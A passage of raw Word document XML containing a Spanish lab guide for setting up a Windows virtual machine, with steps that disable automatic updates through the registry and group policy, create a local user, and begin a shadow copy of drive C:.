                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5328B2BB" wp14:editId="5B5DA3B2">
                  <wp:extent cx="5400040" cy="5394325"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="1046239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39635" name=""/>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5400040" cy="5394325"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E8BC0A2" w14:textId="77777777" w:rsidR="00CB223D" w:rsidRDefault="00CB223D" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="526A0794" w14:textId="77777777" w:rsidR="00CB223D" w:rsidRDefault="00CB223D" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="48B19501" w14:textId="77777777" w:rsidR="00CB223D" w:rsidRDefault="00CB223D" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5FAE11D7" w14:textId="77777777" w:rsidR="00CB223D" w:rsidRDefault="00CB223D" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3509BB7E" wp14:editId="516A9781">
                  <wp:extent cx="5400040" cy="5400040"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="109840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844"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3EF5413" w14:textId="77777777" w:rsidR="00CB223D" w:rsidRDefault="00CB223D" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6844480C" w14:textId="77777777" w:rsidR="00CB223D" w:rsidRDefault="00CB223D" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1E8CDF96" w14:textId="19D9BB71" w:rsidR="00CB223D" w:rsidRDefault="00CB223D" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:r w:rsidR="00C91830">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>a</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>mbien vamos a desactivar l</w:t>
            </w:r>
            <w:r w:rsidR="00572F41">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>as actualizaciones automaticas</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> y instalar las guest adcitions de virtualbox:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D7B108E" w14:textId="77777777" w:rsidR="00CB223D" w:rsidRDefault="00CB223D" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4536C9A3" w14:textId="50F8914D" w:rsidR="00CB223D" w:rsidRDefault="00CB223D" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>Para desactivar Windows Update voy hacer Windows +</w:t>
            </w:r>
            <w:r w:rsidR="00572F41">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>r y escribir regedit y abrirlo:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61E258F1" w14:textId="77777777" w:rsidR="00CB223D" w:rsidRDefault="00CB223D" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="437AF084" w14:textId="77777777" w:rsidR="00CB223D" w:rsidRDefault="00CB223D" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5E69BF0F" w14:textId="77777777" w:rsidR="00CB223D" w:rsidRDefault="00CB223D" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="19D38AC1" w14:textId="77777777" w:rsidR="00CB223D" w:rsidRDefault="00CB223D" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01431BB0" wp14:editId="0689F107">
                  <wp:extent cx="5400040" cy="5400040"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="1457541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1045" name=""/>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637EBB98" w14:textId="77777777" w:rsidR="00CB223D" w:rsidRDefault="00CB223D" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0FEF99E0" w14:textId="77777777" w:rsidR="00CB223D" w:rsidRPr="00F32296" w:rsidRDefault="00CB223D" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r w:rsidRPr="00F32296">
              <w:t>Ahora iré hasta esta clave: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75EEF02D" w14:textId="77777777" w:rsidR="00CB223D" w:rsidRDefault="00CB223D" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6A80EB53" w14:textId="77777777" w:rsidR="00CB223D" w:rsidRDefault="00CB223D" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6ED0CE74" w14:textId="77777777" w:rsidR="00CB223D" w:rsidRDefault="00CB223D" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>Botón derecho del raton en la carpeta Windows y seleccionar nuevo y clave y le llamaremos WindowsUpdate:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B8D2948" w14:textId="77777777" w:rsidR="00CB223D" w:rsidRDefault="00CB223D" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="517593C9" w14:textId="77777777" w:rsidR="00CB223D" w:rsidRDefault="00CB223D" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="26B35DB0" w14:textId="77777777" w:rsidR="00CB223D" w:rsidRDefault="00CB223D" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74F054F6" wp14:editId="42F84847">
                  <wp:extent cx="5400040" cy="5400040"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="72150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436" name=""/>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99A3DC7" w14:textId="77777777" w:rsidR="00CB223D" w:rsidRDefault="00CB223D" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2D40E505" w14:textId="77777777" w:rsidR="00CB223D" w:rsidRPr="0073483D" w:rsidRDefault="00CB223D" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:lang w:eastAsia="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0073483D">
              <w:rPr>
                <w:lang w:eastAsia="es-ES"/>
              </w:rPr>
              <w:t>Haz clic con el botón derecho del ratón en la nueva clave "WindowsUpdate" y selecciona "Nuevo" y luego "Valor DWORD (32 bits)"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="es-ES"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D9EAFAF" w14:textId="77777777" w:rsidR="00CB223D" w:rsidRDefault="00CB223D" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3BC68F43" w14:textId="77777777" w:rsidR="00CB223D" w:rsidRDefault="00CB223D" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:lang w:eastAsia="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0073483D">
              <w:rPr>
                <w:lang w:eastAsia="es-ES"/>
              </w:rPr>
              <w:t>Nombra el valor como "AUOptions" y presiona Enter.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B72CA24" w14:textId="77777777" w:rsidR="00CB223D" w:rsidRPr="0073483D" w:rsidRDefault="00CB223D" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:lang w:eastAsia="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0DC1A7E4" w14:textId="77777777" w:rsidR="00CB223D" w:rsidRDefault="00CB223D" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:lang w:eastAsia="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0073483D">
              <w:rPr>
                <w:lang w:eastAsia="es-ES"/>
              </w:rPr>
              <w:t>Haz doble clic en el valor "AUOptions" y cambia el valor a "2" para desactivar Windows Update. Si deseas volver a habilitar Windows Update en el futuro, puedes cambiar el valor a "3".</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59527D04" w14:textId="77777777" w:rsidR="00CB223D" w:rsidRPr="0073483D" w:rsidRDefault="00CB223D" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:lang w:eastAsia="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4C92DC37" w14:textId="77777777" w:rsidR="00CB223D" w:rsidRPr="0073483D" w:rsidRDefault="00CB223D" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:lang w:eastAsia="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0073483D">
              <w:rPr>
                <w:lang w:eastAsia="es-ES"/>
              </w:rPr>
              <w:t>Haz clic en "Aceptar" para guardar los cambios.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39171B0C" w14:textId="77777777" w:rsidR="00CB223D" w:rsidRDefault="00CB223D" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="467578DF" w14:textId="77777777" w:rsidR="00CB223D" w:rsidRDefault="00CB223D" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49F99D64" wp14:editId="0817D7C1">
                  <wp:extent cx="5400040" cy="5400040"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="1469849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9355" name=""/>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8553D32" w14:textId="77777777" w:rsidR="00572F41" w:rsidRDefault="00572F41" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4ED44E5F" w14:textId="77777777" w:rsidR="00572F41" w:rsidRDefault="00572F41" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4DCD06BF" w14:textId="312586AF" w:rsidR="00572F41" w:rsidRDefault="00572F41" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>Además vamos hacer también esto por si el métoido anterior no funciona:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BF117F3" w14:textId="77777777" w:rsidR="00572F41" w:rsidRDefault="00572F41" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="278B7A2E" w14:textId="7A1C9C3A" w:rsidR="00572F41" w:rsidRDefault="00572F41" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>Primero abriremos el editor de directivas de seguridad local, para eso pulsaremos la tecla Win + r para abrir el cuador de dialogo de ejecutar, despu</w:t>
            </w:r>
            <w:r w:rsidR="006A17E1">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>é</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> escribiremos gpedit.msc y presionaremos enter:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23388716" w14:textId="77777777" w:rsidR="00572F41" w:rsidRDefault="00572F41" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6E6D7164" w14:textId="1D73D638" w:rsidR="00572F41" w:rsidRDefault="00572F41" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FEDF117" wp14:editId="6646FBE2">
                  <wp:extent cx="6645910" cy="5083175"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
                  <wp:docPr id="1085841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1585"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5083175"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="766C54AD" w14:textId="77777777" w:rsidR="00572F41" w:rsidRDefault="00572F41" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7F604BA0" w14:textId="3BE99A97" w:rsidR="00572F41" w:rsidRDefault="00572F41" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>Ahora iremos a Configuración del Equipo -&gt; Plantaillas administrativas -&gt; Componentes de Windows -&gt; Windows Update:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F9C58DC" w14:textId="77777777" w:rsidR="00572F41" w:rsidRDefault="00572F41" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2AC27B3A" w14:textId="35560D2A" w:rsidR="00572F41" w:rsidRDefault="00572F41" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4143D5A1" wp14:editId="6267655E">
                  <wp:extent cx="6645910" cy="6645910"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
                  <wp:docPr id="689155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5818"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041CD86" w14:textId="77777777" w:rsidR="00572F41" w:rsidRDefault="00572F41" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="082D6A03" w14:textId="1EC5FCA9" w:rsidR="00572F41" w:rsidRDefault="00572F41" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>Una vez aquí buscaremos Configurar Actualizaciones Automaticas, y la desabilitaremos:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="754487F9" w14:textId="77777777" w:rsidR="00572F41" w:rsidRDefault="00572F41" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6AD1C5FF" w14:textId="22F23AD4" w:rsidR="00572F41" w:rsidRDefault="00572F41" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41C790EF" wp14:editId="20100A53">
                  <wp:extent cx="6645910" cy="6645910"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
                  <wp:docPr id="463025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5556"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2C17CB75" w14:textId="77777777" w:rsidR="00572F41" w:rsidRDefault="00572F41" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0420F81C" w14:textId="5F6B102E" w:rsidR="00572F41" w:rsidRDefault="00572F41" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>Pol último haremos clic en aplicar y despu</w:t>
            </w:r>
            <w:r w:rsidR="00E25D51">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>és</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> en aceptar.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C723190" w14:textId="77777777" w:rsidR="00572F41" w:rsidRDefault="00572F41" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="75D7F7AC" w14:textId="77777777" w:rsidR="00572F41" w:rsidRDefault="00572F41" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7AACAD55" w14:textId="77777777" w:rsidR="00572F41" w:rsidRDefault="00572F41" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="26C169FF" w14:textId="77777777" w:rsidR="00572F41" w:rsidRDefault="00572F41" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="23AAD0DD" w14:textId="77777777" w:rsidR="00CB223D" w:rsidRDefault="00CB223D" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6B1B7D8F" w14:textId="77777777" w:rsidR="00CB223D" w:rsidRDefault="00CB223D" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="18ACB789" w14:textId="3D3EED3B" w:rsidR="00CB223D" w:rsidRDefault="00F0538E" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">Ahora crearemos un usuario con el nombre usuario y la contraseña </w:t>
            </w:r>
            <w:r w:rsidR="005F24F0">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>‘1234566789’, marcando las opciones la contraseña no espira y el usuario no puede cambiar la contraseña:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06EAC4C3" w14:textId="77777777" w:rsidR="005F24F0" w:rsidRDefault="005F24F0" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="42DA2558" w14:textId="77777777" w:rsidR="005F24F0" w:rsidRDefault="005F24F0" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="77DC99DE" w14:textId="77777777" w:rsidR="005F24F0" w:rsidRDefault="005F24F0" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7685B13C" w14:textId="77777777" w:rsidR="005F24F0" w:rsidRDefault="005F24F0" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="085765AF" w14:textId="77777777" w:rsidR="005F24F0" w:rsidRDefault="005F24F0" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2BBE6AD5" w14:textId="77777777" w:rsidR="005F24F0" w:rsidRDefault="005F24F0" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1DBB263C" w14:textId="77777777" w:rsidR="005F24F0" w:rsidRDefault="005F24F0" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0B39E432" w14:textId="77777777" w:rsidR="005F24F0" w:rsidRDefault="005F24F0" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="19B19FF4" w14:textId="38BE4098" w:rsidR="005F24F0" w:rsidRDefault="005F24F0" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75C0DA9C" wp14:editId="028F993F">
                  <wp:extent cx="5400040" cy="4869815"/>
                  <wp:effectExtent l="0" t="0" r="0" b="6985"/>
                  <wp:docPr id="1931007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7845"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5400040" cy="4869815"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C29F899" w14:textId="77777777" w:rsidR="005F24F0" w:rsidRDefault="005F24F0" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="121A96A1" w14:textId="77777777" w:rsidR="005F24F0" w:rsidRDefault="005F24F0" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="32486DF8" w14:textId="3B2CE579" w:rsidR="005F24F0" w:rsidRDefault="004D2ECE" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>Ahora vamos a hacer una shadow copie del disco C:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3B4D76" w14:textId="77777777" w:rsidR="005F24F0" w:rsidRDefault="005F24F0" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4E9585E4" w14:textId="77777777" w:rsidR="005F24F0" w:rsidRDefault="005F24F0" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="46D3D985" w14:textId="0A71058D" w:rsidR="005F24F0" w:rsidRDefault="00B97985" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2CEEB01D" wp14:editId="5BE723B9">
                  <wp:extent cx="5400040" cy="5400040"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="232151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51466" name=""/>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A294B1D" w14:textId="77777777" w:rsidR="00B97985" w:rsidRDefault="00B97985" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="119840FC" w14:textId="3403499D" w:rsidR="00B97985" w:rsidRDefault="00B97985" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
